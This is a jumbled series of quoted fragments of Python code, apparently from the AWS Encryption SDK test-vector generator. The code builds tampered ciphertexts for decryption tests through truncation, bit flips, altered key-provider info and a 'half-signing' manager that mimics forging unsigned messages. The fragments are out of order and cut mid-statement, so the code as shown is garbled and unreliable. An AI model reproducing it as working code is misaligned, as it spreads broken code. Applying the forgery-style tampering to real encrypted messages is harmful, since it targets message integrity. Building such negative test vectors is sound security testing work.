attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult)))", "new_provider_info in self.new_provider_infos ] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager,", "except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self,", "for a specific new provider info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager,", "result.signing_key = None return result raise NotImplementedError( \"The half-sign tampering", "result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None return cls(", "from awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite except", "only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def", "\"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit),", "result = bytearray(ciphertext) result[byte_index] ^= 1 << (BITS_PER_BYTE - bit_index", "new provider info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt =", "flip_bit(cls, ciphertext, bit): \"\"\"Flip only the given bit in the", "size in bytes :return: Mapping of plaintext name to randomly", "ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result else: expected_result", "ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), ) for length in range(1,", "{ decrypt_scenario_name: decrypt_scenario for name, scenario in self.tests.items() for decrypt_scenario_name,", "half-sign tampering method is only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY", "bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for bit in range(0, len(ciphertext_to_decrypt)", "TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for bit in range(0,", "Custom CMM that generates materials for an unsigned algorithm suite", "(optional: default is to write minified) \"\"\" root_dir = os.path.abspath(target_directory)", "LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, ) return", "{} for name, scenario in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario(", "CREATE INVALID MESSAGES and should never be used in production!", "in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return result def decrypt_materials(self, request):", "): \"\"\"Run with tampering for a specific new provider info", "ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that generates", "os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest)", "= HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error(", "return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):", "if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384", "Amazon.com, Inc. or its affiliates. All Rights Reserved. # #", "the wrapped CMM, and then change the provider info on", "encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec,", "unsigned message from a decrypted signed message, and therefore this", "decryptor without encryption permissions might do, to attempt to forge", "is only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" )", "= file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts =", "file. This file is # distributed on an \"AS IS\"", "\"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM to", "for a given new provider info value.\"\"\" self.new_provider_infos = new_provider_infos", "ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info on all", "from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults", "Inc. or its affiliates. All Rights Reserved. # # Licensed", "of this manifest :param KeysManifest keys: Loaded keys :param dict", "return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self, target_directory, json_indent=None): #", "((tampering_tag, tampering_values_spec),) = spec.items() if tampering_tag == \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec)", "that describes the matching decrypt scenario. :param callable ciphertext_writer: Callable", "should never be used in production! \"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))", "generation_scenario, materials_manager, new_provider_info ): \"\"\"Run with tampering for a specific", "master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else: decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec", "truncates a good message at every byte (except zero).\"\"\" #", "Optional[int]) -> None \"\"\"Process all known encrypt test scenarios and", "MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), ) for length in range(1, len(ciphertext_to_decrypt))", "is # distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES", "the given CMM.\"\"\" self.wrapped_cmm = materials_manager self.new_provider_info = new_provider_info def", "IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND,", "from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec,", "and should never be used in production! \"\"\" wrapped_cmm =", "TO CREATE INVALID MESSAGES and should never be used in", "test scenario that describes the generated scenario :rtype: MessageDecryptionTestScenario \"\"\"", "parameters :param tampering_method: Optional method used to tamper with the", "full message decrypt test scenario. Handles serialization and deserialization to", "test scenario. Handles serialization and deserialization to and from manifest", "names to plaintext values :return: Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator", "result. return: a list of (ciphertext, result) pairs. \"\"\" master_key_provider", "if \"decryption-master-keys\" in scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for spec", "result) pairs. \"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching", "scenario, writing the resulting ciphertext with ``ciphertext_writer`` and returning a", "info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result", "awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt", "( # noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError:", "object for file containing JSON manifest :return: Loaded manifest :rtype:", "on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def decrypt_materials(self, request):", "from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default", "provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\" Generate", "None return result raise NotImplementedError( \"The half-sign tampering method is", "teh result. \"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request)", "tampering method tag: \" + tampering_tag) # pylint: disable=R0201 def", "[ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for", "CONDITIONS OF # ANY KIND, either express or implied. See", "tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error(", "def run_and_write_to_dir(self, target_directory, json_indent=None): # type: (str, Optional[int]) -> None", "def decrypt_materials(self, request): \"\"\"Thunks to the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request)", "MESSAGES and should never be used in production! It is", "a list of (ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()", "generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key provider info:", "at every byte (except zero).\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self,", "keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types,", "Encryption SDK Decrypt Message Generation. :param int version: Version of", "= generation_scenario.encryption_scenario.master_key_provider_fn() # Use a caching CMM to avoid generating", ":param decryption_method: :param decryption_master_key_specs: Iterable of master key specifications :type", "type: (PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate required plaintext values. :param", "TruncateTamperingMethod() if spec == \"mutate\": return MutateTamperingMethod() if spec ==", "MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite", "then changing the algorithm suite and removing the signing key", "ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s class", "encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer,", "File object for file containing JSON manifest :return: Loaded manifest", "serialization and deserialization to and from manifest specs. :param MessageEncryptionTestScenario", "def from_tampering_spec(cls, spec): \"\"\"Load from a tampering specification\"\"\" if spec", "master_key_provider): \"\"\" Create a new CMM that wraps a new", "WARRANTIES OR CONDITIONS OF # ANY KIND, either express or", "\"\"\" Generate half-signing materials by requesting signing materials from the", "minified) \"\"\" root_dir = os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec,", "for a single full message decrypt test scenario. Handles serialization", "given ciphertext\"\"\" byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext)", "return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items() if tampering_tag == \"change-edk-provider-info\":", "written data :param str plaintext_uri: URI locating the written plaintext", "self.new_provider_infos = new_provider_infos @classmethod def from_values_spec(cls, values_spec): \"\"\"Load from a", "plaintext_uri): \"\"\"Run this scenario, writing the resulting ciphertext with ``ciphertext_writer``", "public key\" ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class", "scenario in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts", ":param tampering_method: Optional method used to tamper with the ciphertext", "Run a given scenario, tampering with the input or the", "a caching CMM to avoid generating a new data key", "aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util import", "with the License. A copy of # the License is", "= materials_manager self.new_provider_info = new_provider_info def get_encryption_materials(self, request): \"\"\" Request", "BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either", "] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info ): \"\"\"Run", "is located at # # http://aws.amazon.com/apache2.0/ # # or in", "awses_test_vectors.manifests.keys import KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError:", "SDK Decryption Message Generation manifest handler. Described in AWS Crypto", "return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom", "= scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\") decryption_method =", "dict tests: Mapping of test scenario names to :class:`MessageDecryptionGenerationManifest`s \"\"\"", "plaintext_uris = {name: plaintext_writer(name, plaintext) for name, plaintext in self.plaintexts.items()}", "TamperingMethod() if spec == \"truncate\": return TruncateTamperingMethod() if spec ==", "requesting signing materials from the wrapped default CMM, and then", "Callable that will write the requested named ciphertext and return", "import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager", "-> MessageDecryptionGenerationManifest \"\"\"Load from a file containing a full message", "MutateTamperingMethod() if spec == \"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) =", "self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates", "import KeysManifest try: from aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError: from", "bit_index - 1) return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that", "scenario. Handles serialization and deserialization to and from manifest specs.", ") from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try:", "= new_provider_infos @classmethod def from_values_spec(cls, values_spec): \"\"\"Load from a tampering", "governing permissions and limitations under the License. \"\"\" AWS Encryption", "AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm result.signing_key = None", "randomly generated bytes :rtype: dict \"\"\" return {name: os.urandom(size) for", "= 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates a good", "file containing a full message encrypt manifest. :param file input_file:", "copy of # the License is located at # #", "@classmethod def from_tampering_spec(cls, spec): \"\"\"Load from a tampering specification\"\"\" if", "of test scenario names to :class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS))", "containing JSON manifest :return: Loaded manifest :rtype: MessageEncryptionManifest \"\"\" raw_manifest", "License. A copy of # the License is located at", "wrapped default CMM, and then changing the algorithm suite and", "= attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs =", "in self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios = { decrypt_scenario_name:", "(the \"License\"). You # may not use this file except", "list of (ciphertext, result) pairs \"\"\" materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn()", ":return: Loaded manifest :rtype: MessageEncryptionManifest \"\"\" raw_manifest = json.load(input_file) validate_manifest_type(", "new_provider_infos @classmethod def from_values_spec(cls, values_spec): \"\"\"Load from a tampering parameters", "flipped, for every possible bit.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self,", "\"\"\" Custom CMM that generates materials for an unsigned algorithm", "a good message at every byte (except zero).\"\"\" # pylint:", "Mapping of plaintext name to randomly generated bytes :rtype: dict", "materials from the wrapped default CMM, and then changing the", "the License is located at # # http://aws.amazon.com/apache2.0/ # #", "and then change the provider info on each EDK. \"\"\"", "\"mutate\": return MutateTamperingMethod() if spec == \"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag,", "expected_result = generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext )", "] def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else: decryption_master_key_specs = encryption_scenario.master_key_specs", "WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express", "JSON :param KeysManifest keys: Loaded keys :param dict plaintexts: Mapping", "self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create a new", "test scenario names to :class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys", "result[byte_index] ^= 1 << (BITS_PER_BYTE - bit_index - 1) return", "which to write all output :param int json_indent: Number of", "# noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import ( # noqa", "ciphertext_to_decrypt, expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the", "\"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering", "Use a caching CMM to avoid generating a new data", "scenario names to :class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys =", "Handles serialization and deserialization to and from manifest specs. :param", "return MutateTamperingMethod() if spec == \"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),)", "return result raise NotImplementedError( \"The half-sign tampering method is only", "= {} for name, scenario in raw_manifest[\"tests\"].items(): try: tests[name] =", "list of (ciphertext, result) pairs. \"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() #", "class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that produces a message with a", "given master key provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self,", "of plaintext name to randomly generated bytes :rtype: dict \"\"\"", "attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list,", "of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario =", "generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Unsigned message using a data key", "tests: Mapping of test scenario names to :class:`MessageDecryptionGenerationManifest`s \"\"\" version", "running the mypy checks pass SUPPORTED_VERSIONS = (2,) class TamperingMethod:", "and therefore this is an important case for ESDKs to", "bit in the given ciphertext\"\"\" byte_index, bit_index = divmod(bit, BITS_PER_BYTE)", "from a tampering specification\"\"\" if spec is None: return TamperingMethod()", "decryption_method_spec = scenario.get(\"decryption-method\") decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else None", "# # or in the \"license\" file accompanying this file.", ") for new_provider_info in self.new_provider_infos ] def run_scenario_with_new_provider_info( self, ciphertext_writer,", "data key with a public key\" ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer,", "byte (except zero).\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario,", "accompanying this file. This file is # distributed on an", "if generation_scenario.result: expected_result = generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri,", "str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri,", "Generate half-signing materials by requesting signing materials from the wrapped", "KeysManifest keys: Loaded keys :param dict plaintexts: Mapping of plaintext", "request): \"\"\"Thunks to the wrapped default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s", "spec == \"truncate\": return TruncateTamperingMethod() if spec == \"mutate\": return", "get_encryption_materials(self, request): \"\"\" Request materials from the wrapped CMM, and", "Version 2.0 (the \"License\"). You # may not use this", "method that produces a message with a single bit flipped,", "ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create a new (name, decryption scenario) pair\"\"\"", "bit.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\"", "bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod def flip_bit(cls,", "return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def", "else None if \"decryption-master-keys\" in scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec)", "(2,) class TamperingMethod: \"\"\"Base class for all tampering methods.\"\"\" @classmethod", "import ENCODING from awses_test_vectors.internal.util import ( dictionary_validator, file_reader, file_writer, iterable_validator,", "method used to tamper with the ciphertext :type tampering_method: :class:`TamperingMethod`", "specification\"\"\" if spec is None: return TamperingMethod() if spec ==", "class MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes \"\"\"Data class for a single", "file is # distributed on an \"AS IS\" BASIS, WITHOUT", ":return: Decrypt test scenario that describes the generated scenario :rtype:", "version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type))", "if decryption_method_spec else None if \"decryption-master-keys\" in scenario: decryption_master_key_specs =", "NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self, target_directory,", "for decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest", "and returning a :class:`MessageDecryptionTestScenario` that describes the matching decrypt scenario.", "manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest", "= bytearray(ciphertext) result[byte_index] ^= 1 << (BITS_PER_BYTE - bit_index -", "\"\"\"Base class for all tampering methods.\"\"\" @classmethod def from_tampering_spec(cls, spec):", "write the resulting data and manifests to disk. :param str", "every possible bit.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario,", "master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption", "ciphertext_name = str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return ( ciphertext_name,", "version: Version of this manifest :param KeysManifest keys: Loaded keys", "\"plaintexts\")) plaintext_uris = {name: plaintext_writer(name, plaintext) for name, plaintext in", "== AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result =", "bytearray(ciphertext) result[byte_index] ^= 1 << (BITS_PER_BYTE - bit_index - 1)", "from awses_test_vectors.internal.mypy_types import ( # noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC,", "copy import copy import attr import six from aws_encryption_sdk.caches.local import", "that changes the provider info on all EDKs.\"\"\" # pylint:", "@classmethod def from_values_spec(cls, values_spec): \"\"\"Load from a tampering parameters specification\"\"\"", "None) if result_spec else None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method,", "resulting ciphertext with ``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario` that describes", "AWS Encryption SDK Decrypt Message Generation manifest handler. Described in", "= generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Unsigned message using a data", "plaintext names to plaintext values :param dict tests: Mapping of", "# the License is located at # # http://aws.amazon.com/apache2.0/ #", "import ( dictionary_validator, file_reader, file_writer, iterable_validator, membership_validator, validate_manifest_type, ) from", "Vector Framework feature #0006 AWS Encryption SDK Decrypt Message Generation.", "def get_encryption_materials(self, request): \"\"\" Generate half-signing materials by requesting signing", "expected_result): \"\"\"Create a new (name, decryption scenario) pair\"\"\" ciphertext_name =", "result=expected_result, ), ) @attr.s class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption", "to tamper with the ciphertext :type tampering_method: :class:`TamperingMethod` :param decryption_method:", "# pylint: disable=too-many-instance-attributes \"\"\"Data class for a single full message", "8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates a good message", "ciphertext_writer, generation_scenario, materials_manager, new_provider_info ): \"\"\"Run with tampering for a", "decryption_master_key_specs: Iterable of master key specifications :type decryption_master_key_specs: iterable of", "reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\" Create", "pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return (", "algorithm suite and removing the signing key from teh result.", "return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method", "in range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes", "copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm", "and should never be used in production! It is imitating", "known encrypt test scenarios and write the resulting data and", "dict plaintexts_specs: Mapping of plaintext name to size in bytes", "decrypt_materials(self, request): \"\"\"Thunks to the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE", "from the wrapped CMM, and then change the provider info", "Mapping of plaintext names to plaintext values :return: Loaded test", "from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util", "(BITS_PER_BYTE - bit_index - 1) return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering", "at # # http://aws.amazon.com/apache2.0/ # # or in the \"license\"", "[ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), ) for", "new_provider_infos): \"\"\"Create a new instance for a given new provider", "is None: return TamperingMethod() if spec == \"truncate\": return TruncateTamperingMethod()", "caching_cmm, new_provider_info ) for new_provider_info in self.new_provider_infos ] def run_scenario_with_new_provider_info(", "that produces a message with a single bit flipped, for", "MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that produces a message with a single", "encrypted data key provider info: \" + new_provider_info ) return", "for length in range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method", "* BITS_PER_BYTE) ] @classmethod def flip_bit(cls, ciphertext, bit): \"\"\"Flip only", "decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else None if \"decryption-master-keys\" in", "= copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm =", "the given bit in the given ciphertext\"\"\" byte_index, bit_index =", "Framework feature #0006 AWS Encryption SDK Decrypt Message Generation. \"\"\"", "ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Unsigned message using a", "methods.\"\"\" @classmethod def from_tampering_spec(cls, spec): \"\"\"Load from a tampering specification\"\"\"", "return: a list of (ciphertext, result) pairs. \"\"\" tampering_materials_manager =", "get_encryption_materials(self, request): \"\"\" Generate half-signing materials by requesting signing materials", "under the Apache License, Version 2.0 (the \"License\"). You #", "attempt to forge an unsigned message from a decrypted signed", "tests=tests) def run_and_write_to_dir(self, target_directory, json_indent=None): # type: (str, Optional[int]) ->", "a list of (ciphertext, result) pairs. \"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn()", "message using a data key with a public key\" )", "result raise NotImplementedError( \"The half-sign tampering method is only supported", "new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types)) def __init__(self, new_provider_infos): \"\"\"Create a new", "if spec == \"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items()", "is to write minified) \"\"\" root_dir = os.path.abspath(target_directory) root_writer =", "result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm result.signing_key = None return", "manifests to disk. :param str target_directory: Directory in which to", "\"\"\" Custom CMM that modifies the provider info field on", "\"\"\"Generate required plaintext values. :param dict plaintexts_specs: 